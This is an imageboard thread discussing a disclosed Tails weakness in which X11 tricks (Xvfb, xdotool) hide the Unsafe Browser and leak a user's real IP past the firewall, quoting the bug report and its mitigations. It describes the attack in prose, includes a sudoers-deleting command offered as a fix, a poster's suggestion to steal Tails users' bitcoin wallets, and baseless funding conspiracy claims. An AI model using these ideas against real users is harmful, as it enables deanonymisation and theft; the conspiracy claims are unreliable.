/tech/ - Technology★

Tails is just debian with iptables andan upgrade program included

>>1039976

that's literally every linux distro ever

>this example script can run in the background

how's that going to happen exactly?

>leak your public IP

>www.yourip.us

just have it connect to a server set up to listen for such requests.

what is that server going to do with this information? If it can't be correlated with anything, it's just "someone ran Tails on this IP"

this is why whonix style is superior

always have a workstation vm and a gateway vm

ensure the workstation only connect to the internet via tor ports, nat is disabled, everything firewalled off, etc.

no matter how much you fuck up on the workstation it will be nearly impossible to connect to anything outside of the tor ports on the gateway, short of exploit allowing you to jump out of a VM, but then your fucked anyway.

>>1039979

That's just an example, you can do worse things, you just need to compromise the amnesia account first, which I consider gameover anyway.

>how's that going to happen exactly?

It uses x fuckery to run hidden gui prorgrams and xdotool to simulate mouse and keynoard presses. the script just navigates to www.yourip.us in the unsafe browser and reads the window name, all while it's hidden from view

>>1040030

Is the point of this thread that executing untrusted scripts in Tails can be dangerous?

>not using heads

https://heads.dyne.org/

>>1039977

>$ Xvfb

<-bash: Xvfb: command not found

>$ xdotool

<-bash: xdotool: command not found

>>1039972 (OP)

>installing sudo

>insalling *bus

>installing zenity

>using any of that bloat to open your attack surface up

Isn't that supposed to be a operating system for security/privacy? Where's the statically compiled musl? Where's the GRSEC and RBAC? is this a joke?

i become curl | bash destroyer of noobs

UNIX has more holes than Swiss cheese.

Subject: Re: UNIX (In)Security

> From: AB 
> 
> I'm trying to convince my favorite TLA official that
> putting data on a UNIX machine on the TLA network is about
> as secure as posting it to alt.flame. Does anyone have a
> document on UNIX (in)security I could pass on?

alt.flame would be inappropriate if the material in question
isn't a flame or a response to one.  I suggest tla.bboard if
the data is about things of general interest (like how much
certain people make).

Or, you could just put it up for anonymous ftp with the X
sources (eww!) on export.eve.rcl.ear.  Then post a "ThE
sEkrIt Tla dATa yoU hAve BeEn waItInG foR is ON
eXpoRt.eve.rcl.ear" message to misc.wanted.

Seriously, look at the Kerberos papers.  Look at the Orange
Book (trusted systems evaluation manual from the NCSC).
Realize that Unix security is like swiss cheese - not a
Jarlsberg or other cheese with a few big holes in it, but an
Alpine Lace cheese with thousands of tiny holes in it which
you could never plug all of.  You can wrap it in saran wrap,
but you've still done nothing for the underlying structure,
save for reducing the rate at which mold grows on it.

>>1040031

the point is that tails claims the amnesia user cant leak your real IP without escalating to another user (priv escalation exploit). The OP shows it can.

sudo rm /etc/sudoers.d/zzz_unsafe-browser

issue fixed

>>1040024

This.

Allowing access to the regular internet is just an accident waiting to happen.

There has been a ticket for this for almost a year but it's been ignored.

https://redmine.tails.boum.org/code/issues/15635

The X11 protocol has long been known to not provide isolation between windows. Here I will show that it can be abused to bypass the firewall without any user interaction or visible side-effects by abusing the Unsafe Browser. I also provide mitigations while waiting for the switch to Wayland.

The existence of the clearnet user and the sudoers whitelist1 for the Unsafe Browser makes it possible to reliably bypass the firewall by abusing the X11 protocol. Previously, I've seen doubts that this can be done surreptitiously and claims that it would necessarily require that the users see the browser pop up and the mouse be moved without their control. I have written a simple PoC (proof of concept) exploit which bypasses the firewall to show that is untrue:

The Unsafe Browser, or more specifically the clearnet user, should not be enabled and functional by default. Whenever it is not needed, the clearnet user should be locked, and the Unsafe Browser should either throw an error on access or not even be displayed. I can think of three mitigations:

Disable the browser by default, requiring it to be explicitly enabled in the splash screen.

Disable the browser as soon as Tor successfully connects, which would indicate no captive portal.

Attempt captive portal detection2 to detect request rewrites and enable the Unsafe Browser only then.

I am marking this as a bug because this PoC clearly shows that the Unsafe Browser violates the security principles in the specified design documents3. Until the switch to Wayland is completed (and perhaps even then), the existence of the clearnet user should be considered incompatible with anonymous Tor usage. I am currently working on another exploit which bypasses the browser AppArmor profile without user interaction in order for this to be possible from within the context of a compromised browser as well. If I have the time, I will finish it up and report it as well.

[1]: https://git-tails.immerda.ch/tails/plain/config/chroot_local-includes/etc/sudoers.d/zzz_unsafe-browser

[2]: https://www.chromium.org/chromium-os/chromiumos-design-docs/network-portal-detection

[3]: https://tails.boum.org/contribute/design/Unsafe_Browser/

>>1040069

I wouldn't trust heads, an early version had the controlport open for To without a filter/whitelist and a simple GETINFO address to the Tor controlport would reveal your true IP. It's since been fixed but that's an amatuer mistake.

Who cares about their IP? If you can get RCE on a tails user, go for the electrum/bitcoin wallet. 90% of people who use tails are drug dealers/buyers.

Before https://www.reddit.com/r/darknetmarketsnoobs was banned, it has thousands of viewers a day and all the posts were mostly normies having issues running Tails.

>>1040202

Also, a simple priv escalation bug just was fixed in the latest version of heads 0.4. Updates weren't even GPG signed. Use heads with caution.

How does tails get millions of dollar in donations? I literally made something that works exactly like tails with debian live-build in 3 days with a few hours of work a day. It didn't have the auto update infrastructure but still. It was the same way that tails build images, through deban live-build scripts with a packagelist and preconfigured configs.

>>1040217

How much are you paying your shills? How many news sites have you had publish a shill piece on it?

At least you can reap some benefits from security by obscurity.

>>1040217

Slush fund from the big 3

>soros, roths, rocks (exclude saudis since they sided with trumpo)

>>1040281

Notice how this NSA shill spreads FUD without backing up his claims or even offering secure alternatives to what he perceives as a honeypot. Begone officer.

>>1040121

Windows has more holes than the average claim on /tech/ but life goes on. Also linux is not unix.

>>1040797

>Windows has more holes than the average claim on /tech/ but life goes on.

Are you a Microsoft shill, else why are you bringing up Windows?

>Also linux is not unix.

Correct, but it and the user spaces that are commonly paired with it are UNIX-like.